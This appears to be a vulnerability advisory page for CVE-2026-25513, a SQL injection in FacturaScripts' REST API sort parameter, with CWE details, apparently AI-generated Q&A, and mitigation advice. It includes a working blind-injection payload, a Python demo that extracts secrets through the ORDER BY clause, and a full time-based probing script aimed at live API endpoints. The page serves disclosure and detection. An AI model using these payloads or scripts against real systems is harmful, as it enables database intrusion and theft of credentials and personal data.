CVE-2026-25513
Critical SQL Injection in FacturaScripts REST API Sorting Parameter
Publication date: 2026-02-04
Last updated on: 2026-02-23
Assigner: GitHub, Inc.
Description
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| facturascripts | facturascripts | < 2025.81 (all releases before 2025.81; 2025.81 itself is fixed) |
Exploitability
| CWE ID | Description |
|---|---|
| CWE-89 | The product constructs all or part of an SQL command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended SQL command when it is sent to a downstream component. Without sufficient removal or quoting of SQL syntax in user-controllable inputs, the generated SQL query can cause those inputs to be interpreted as SQL instead of ordinary user data. |
| CWE-20 | The product receives input or data, but it does not validate or incorrectly validates that the input has the properties that are required to process the data safely and correctly. |
| CWE-943 | The product generates a query intended to access or manipulate data in a data store such as a database, but it does not neutralize or incorrectly neutralizes special elements that can modify the intended logic of the query. |
| CWE-1286 | The product receives input that is expected to be well-formed - i.e., to comply with a certain syntax - but it does not validate or incorrectly validates that the input complies with the syntax. |
AI Powered Q&A
Can you explain this vulnerability to me?
CVE-2026-25513 is a critical SQL injection vulnerability in the FacturaScripts REST API affecting all versions before 2025.81. The flaw is in the handling of the `sort` parameter used to order API query results: in `ModelClass::getOrderBy()` and `DbQuery::orderBy()`, the field names and directions supplied by the caller are concatenated directly into the SQL ORDER BY clause without validation or sanitization.
Because the ORDER BY clause is built from the raw parameter, an authenticated API user can place arbitrary SQL expressions in the sort field and have the database execute them.
Exploitation requires a valid API authentication token and network access to the API endpoints. Since the API returns sorted rows rather than the value of the injected expression, the practical technique is blind injection: a time-based payload (a sub-select calling SLEEP()) confirms the flaw, and conditional or timed expressions then extract data one value at a time.
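The mechanism above, as an added illustration that is not FacturaScripts code (the project is PHP; Python is used here so the example runs stand-alone): a minimal ORDER BY builder that concatenates `sort[field]=direction` pairs verbatim, and a demonstration of why that turns the sort key into a blind-injection oracle. The `users` table, its `secret` column and the rows are constructed for the demo. SQLite has no `SLEEP()`, so instead of the timing payload the injected sub-expression flips the row order depending on a condition, which is the same oracle principle.

```python
# Added illustration for CVE-2026-25513, not FacturaScripts code: the
# vulnerable pattern (client-controlled sort fields concatenated into SQL)
# and the blind oracle it creates. Schema and rows are constructed here.
import sqlite3


def vulnerable_order_by(sort: dict) -> str:
    """Trusts field names and directions exactly as the client sent them."""
    if not sort:
        return ""
    return " ORDER BY " + ", ".join(f"{field} {direction}"
                                    for field, direction in sort.items())


def vulnerable_query(conn: sqlite3.Connection, sort: dict) -> list:
    """Models an API listing that only ever returns the 'nick' column."""
    sql = "SELECT nick FROM users" + vulnerable_order_by(sort)
    return [row[0] for row in conn.execute(sql)]


def demo_db() -> sqlite3.Connection:
    """Constructed sample data; 'secret' stands for any value the API never
    returns directly (password hashes, API keys, ...)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, nick TEXT, secret TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)",
                     [(1, "admin", "s3cret"), (2, "bob", "x"), (3, "carol", "y")])
    return conn


def oracle(conn: sqlite3.Connection, prefix: str) -> bool:
    """One yes/no question answered purely by the order of the rows.
    The injected CASE sorts by ascending id (admin first) when the guessed
    prefix matches and by descending id otherwise. SQLite's LIKE is
    case-insensitive for ASCII; the demo secret is lowercase."""
    field = (f"(CASE WHEN (SELECT secret FROM users WHERE id=1) "
             f"LIKE '{prefix}%' THEN id ELSE -id END)")
    return vulnerable_query(conn, {field: "ASC"})[0] == "admin"


def extract_secret(conn: sqlite3.Connection,
                   alphabet: str = "abcdefghijklmnopqrstuvwxyz0123456789",
                   max_len: int = 16) -> str:
    """Recovers the hidden value one character at a time through the oracle."""
    known = ""
    for _ in range(max_len):
        for ch in alphabet:
            if oracle(conn, known + ch):
                known += ch
                break
        else:
            return known  # no character extends the prefix: done
    return known


if __name__ == "__main__":
    # The page's payload lands in the clause untouched.
    print(vulnerable_order_by({"nick,(SELECT(SLEEP(3)))": "ASC"}))
    print(extract_secret(demo_db()))
```

The point of `extract_secret` is that nothing about the response format matters: as long as the attacker can tell two row orders apart, every bit in the database is reachable through ORDER BY alone, which is why the advisory rates the confidentiality impact as full disclosure.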
How can this vulnerability impact me?
The impact is complete database disclosure through blind SQL injection. An attacker holding valid API credentials can extract anything the database user can read: user credentials, API keys, customer personally identifiable information (PII), financial records, business intelligence and system secrets.
Exposure extends to every organization that integrates with the FacturaScripts API (mobile apps, third-party integrations, business partners with API access) and to every user whose data is reachable through it.
The CVSS base score is 8.3, a High rating driven by the confidentiality impact: full read access to the data store.
How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?
I don't know
How can this vulnerability be detected on my network or system? Can you suggest some commands?
Detection means testing the FacturaScripts REST API endpoints that accept sorting, such as `/api/3/users` or `/api/3/customers`, for SQL injection through the `sort` parameter.
The usual method is to send authenticated requests whose `sort` key carries a SQL payload and watch for behaviour the query would not otherwise show, most simply a time delay.
For a time-based blind test, inject a payload such as `sort[nick,(SELECT(SLEEP(3)))]=ASC` and measure whether the response arrives roughly 3 seconds later than a clean request; a consistent delay confirms the injection. `SLEEP()` is MySQL/MariaDB syntax; against a PostgreSQL backend the equivalent is `pg_sleep()`. Compare against several clean requests so that ordinary latency variance is not mistaken for a delay.
The test needs a valid API authentication token (`X-Auth-Token` header), obtained by logging into the web interface, which involves handling CSRF tokens and session cookies.
This is easily scripted, for example in Python: log in, retrieve the API key, then send requests with crafted `sort` parameters and compare their response times with a baseline.
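A time-based check of the kind described above, as an added example that is not from the page or the project. It assumes you already hold a valid token (the login and CSRF handling are out of scope here), sends it in the `X-Auth-Token` header as the page states, and uses `/api/3/users` and the `nick` field from the page's payload; the HTTP transport is a pluggable callable, and `simulated_send` is a constructed stand-in for a vulnerable MySQL backend so the timing logic can be exercised offline.

```python
# Added example, not from the page: time-based blind SQL injection probe for
# the FacturaScripts sort parameter. Assumptions: token already obtained,
# X-Auth-Token header, MySQL/MariaDB SLEEP() syntax, endpoint path as given.
import time
import urllib.error
import urllib.parse
import urllib.request
from typing import Callable

SendFn = Callable[[str, str, float], int]   # (url, token, timeout) -> HTTP status


def build_url(base_url: str, endpoint: str, sort_field: str,
              direction: str = "ASC") -> str:
    """Encodes sort[<field>]=<direction> as a query string."""
    query = urllib.parse.urlencode({f"sort[{sort_field}]": direction})
    return f"{base_url.rstrip('/')}/{endpoint.lstrip('/')}?{query}"


def sleep_payload(base_field: str, seconds: float) -> str:
    """The page's payload shape: a SLEEP() sub-select appended to a real field."""
    return f"{base_field},(SELECT(SLEEP({seconds:g})))"


def http_send(url: str, token: str, timeout: float) -> int:
    """Real transport. A 4xx/5xx after the delay is still a timing sample."""
    req = urllib.request.Request(url, headers={"X-Auth-Token": token})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status
    except urllib.error.HTTPError as err:
        return err.code


def simulated_send(delay: float) -> SendFn:
    """Constructed offline stand-in: a 'server' that sleeps only when the
    decoded query contains SLEEP(, mimicking a vulnerable MySQL backend."""
    def send(url: str, token: str, timeout: float) -> int:
        if "SLEEP(" in urllib.parse.unquote(url):
            time.sleep(delay)
        return 200
    return send


def timed(send: SendFn, url: str, token: str, timeout: float) -> float:
    start = time.monotonic()
    send(url, token, timeout)
    return time.monotonic() - start


def probe(base_url: str, endpoint: str, token: str, base_field: str = "nick",
          seconds: float = 3, send: SendFn = http_send) -> dict:
    """Compares the slowest clean request with the fastest injected one and
    declares the parameter vulnerable only if the gap is at least 80% of the
    requested SLEEP, so one slow baseline cannot produce a false positive."""
    clean = build_url(base_url, endpoint, base_field)
    injected = build_url(base_url, endpoint, sleep_payload(base_field, seconds))
    timeout = seconds * 4 + 5
    baseline = max(timed(send, clean, token, timeout) for _ in range(2))
    delayed = min(timed(send, injected, token, timeout) for _ in range(2))
    return {"baseline": baseline, "injected": delayed,
            "vulnerable": (delayed - baseline) >= 0.8 * seconds}


if __name__ == "__main__":
    import sys
    base, tok = sys.argv[1], sys.argv[2]   # e.g. https://erp.example/ <api token>
    print(probe(base, "/api/3/users", tok))
```

Run it against a staging copy, never production: every positive sample holds a database connection for the full sleep. A patched 2025.81 instance should reject the sort field outright, which this probe reports as a fast, non-vulnerable response.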
What immediate steps should I take to mitigate this vulnerability?
[{'type': 'paragraph', 'content': 'Immediate mitigation steps include applying strict validation and sanitization to the `sort` parameter used in API requests to prevent SQL injection.'}, {'type': 'list_item', 'content': 'Validate column names against a whitelist of valid model fields.'}, {'type': 'list_item', 'content': "Restrict sort directions strictly to 'ASC' or 'DESC', normalizing input and defaulting invalid values to 'ASC'."}, {'type': 'list_item', 'content': 'Escape column names properly before concatenation to the SQL query.'}, {'type': 'list_item', 'content': 'Implement special handling for fields with parentheses by allowing only specific SQL functions such as LOWER(), UPPER(), and CAST() with valid syntax.'}, {'type': 'list_item', 'content': 'Use prepared statements or query builder patterns that safely apply sorting parameters instead of direct string concatenation.'}, {'type': 'paragraph', 'content': 'Updating FacturaScripts to version 2025.81 or later, where these fixes have been implemented, is strongly recommended.'}] [1, 2]